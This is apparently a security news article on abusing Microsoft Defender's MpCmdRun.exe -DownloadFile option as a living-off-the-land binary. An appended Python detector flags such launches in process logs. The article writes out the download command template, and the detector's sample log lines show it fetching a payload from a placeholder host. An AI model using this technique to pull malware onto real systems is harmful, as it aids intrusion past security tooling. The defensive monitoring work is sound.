Legitimate operating-system binaries that can be abused for malicious purposes are known as living-off-the-land binaries, or LOLBins.
With the latest Microsoft Defender update, the command-line tool MpCmdRun.exe can be made to download malicious files from a remote location.
With this trick, Microsoft Defender becomes yet another Windows program that a malicious actor can exploit to carry out attacks.
Microsoft Defender can be used as a LOLBIN
Security researcher Mohammad Askar was the first to discover that a recent update to the Microsoft Defender command-line tool adds a new DownloadFile command-line option.
This capability allows a local user to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download a file from a remote location with the following command:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
According to information published by BleepingComputer, this feature was added to Microsoft Defender in version 4.18.2007.9 or 4.18.2009.9.
As you can see below, the resources.exe file downloaded this way is a sample of the WastedLocker ransomware that was used in the recent attack on Garmin.
The good news is that Microsoft Defender is able to detect malicious files downloaded with MpCmdRun.exe, but it is unknown whether other AV products will let this program slip past their checks. With this discovery, system administrators and security teams now have one more Windows executable that they need to monitor so that it is not used against them.
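A starting point for that monitoring, as an added example that is not part of the original article: a small Python detector that parses process-creation events flattened to key="value" pairs (the field names and every sample path, host name and file name are constructed for this example) and flags any MpCmdRun.exe launch whose command line carries the -DownloadFile switch, recording the parent process, the URL and the destination path for triage. Switch names are matched case-insensitively and in any order, so a routine scan does not alert while a download launched from a shell does.

```python
import re
from typing import Dict, List, Optional

# Constructed process-creation records, flattened to key="value" pairs the way
# a log shipper might emit Sysmon Event ID 1 / Security 4688 events. All paths,
# hosts and file names below are made up for this example.
SAMPLE_EVENTS = [
    # Routine Defender scan: legitimate use, must not alert.
    'Image="C:\\Program Files\\Windows Defender\\MpCmdRun.exe" '
    'ParentImage="C:\\Windows\\System32\\svchost.exe" '
    'CommandLine="MpCmdRun.exe -Scan -ScanType 1"',
    # DownloadFile launched from an interactive shell: the LOLBIN pattern.
    'Image="C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2009.9-0\\MpCmdRun.exe" '
    'ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="MpCmdRun.exe -DownloadFile -url http://example.invalid/payload.bin -path C:\\Users\\Public\\resources.exe"',
    # Unrelated process.
    'Image="C:\\Windows\\System32\\notepad.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="notepad.exe notes.txt"',
    # Same switch with different casing and argument order: still an alert.
    'Image="C:\\Program Files\\Windows Defender\\MpCmdRun.exe" '
    'ParentImage="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="mpcmdrun.exe -PATH C:\\Temp\\update.dat -downloadfile -URL https://example.invalid/update.dat"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
TOKEN_RE = re.compile(r'"[^"]*"|\S+')


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key="value" ... line into a dict of field name to value."""
    return dict(FIELD_RE.findall(line))


def tokenize(command_line: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans together."""
    return [tok.strip('"') for tok in TOKEN_RE.findall(command_line)]


def detect_mpcmdrun_download(event: Dict[str, str]) -> Optional[Dict[str, str]]:
    """Return a finding if this event is MpCmdRun.exe invoked with -DownloadFile."""
    image = event.get("Image", "")
    # Match on the executable name only; the install path varies by platform version.
    if image.rsplit("\\", 1)[-1].lower() != "mpcmdrun.exe":
        return None
    tokens = tokenize(event.get("CommandLine", ""))
    lowered = [t.lower() for t in tokens]
    if "-downloadfile" not in lowered:
        return None

    def value_after(switch: str) -> str:
        # Switch names are compared case-insensitively; the value is the next token.
        if switch in lowered and lowered.index(switch) + 1 < len(tokens):
            return tokens[lowered.index(switch) + 1]
        return ""

    return {
        "image": image,
        "parent": event.get("ParentImage", ""),
        "url": value_after("-url"),
        "path": value_after("-path"),
    }


def scan_events(lines: List[str]) -> List[Dict[str, str]]:
    """Run the detector over raw log lines and collect the findings in order."""
    findings = []
    for line in lines:
        finding = detect_mpcmdrun_download(parse_event(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"ALERT MpCmdRun DownloadFile: parent={f['parent']} url={f['url']} path={f['path']}")
```

The parent process is kept in the finding because it is usually the most useful triage signal: MpCmdRun.exe spawned by the Defender service for a scheduled scan is routine, while the same binary spawned from cmd.exe or powershell.exe with -DownloadFile is the pattern described in the article.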